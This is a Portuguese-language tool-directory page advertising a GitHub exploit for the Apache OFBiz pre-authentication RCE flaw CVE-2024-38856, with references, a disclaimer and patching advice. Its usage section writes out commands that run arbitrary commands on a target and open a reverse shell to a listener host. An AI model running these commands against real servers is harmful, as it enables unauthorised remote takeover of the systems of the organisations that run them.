Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Apache-OFBiz-Exploit — Exploit para Apache OFBiz - CVE-2024-38856 | Kitploit
Ferramentas/GitHubGitHub/alissonfaoli/apache-ofbiz-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubalissonfaoli/apache-ofbiz-exploit

Apache-OFBiz-Exploit

Exploit para Apache OFBiz - CVE-2024-38856

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Apache-OFBiz-Exploit

Exploit para Apache OFBiz (CVE-2024-38856) Por: Alisson Faoli

Descrição

Este repositório contém um exploit para a vulnerabilidade CVE-2024-38856 encontrada no Apache OFBiz. A falha permite RCE (Execução Remota de Código) sem autenticação.

Nota: Este exploit é fornecido apenas para fins educacionais e de pesquisa. O uso indevido pode ser ilegal e é de inteira responsabilidade do usuário.

Detalhes da Vulnerabilidade

CVE: CVE-2024-38856

Software Afetado: Apache OFBiz até a versão 18.12.14

Tipo de Vulnerabilidade: RCE

Exploração: Autenticação não necessária

Referências:

  • https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
  • https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/

Uso

Clone o repositório:

root@kitploit:~
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit

Instale as dependências:

root@kitploit:~
pip install -r requirements.txt

Execute o exploit:

RCE: python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"

SHELL: python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444

Mitigação

Para corrigir esta vulnerabilidade, recomenda-se que os administradores do Apache OFBiz: Atualizem para a versão corrigida disponível em https://ofbiz.apache.org/download.html. Apliquem regras de firewall ou WAF para bloquear tentativas conhecidas de exploração.

Contato

Se você tiver alguma dúvida ou quiser relatar uma melhoria no exploit, entre em contato: LinkedIn: https://linkedin.com/in/alisson-faoli/

Aviso Legal:

Este código é fornecido exclusivamente para fins educacionais e testes de segurança em ambientes autorizados. O autor não se responsabiliza por qualquer uso indevido.

Baixar ferramenta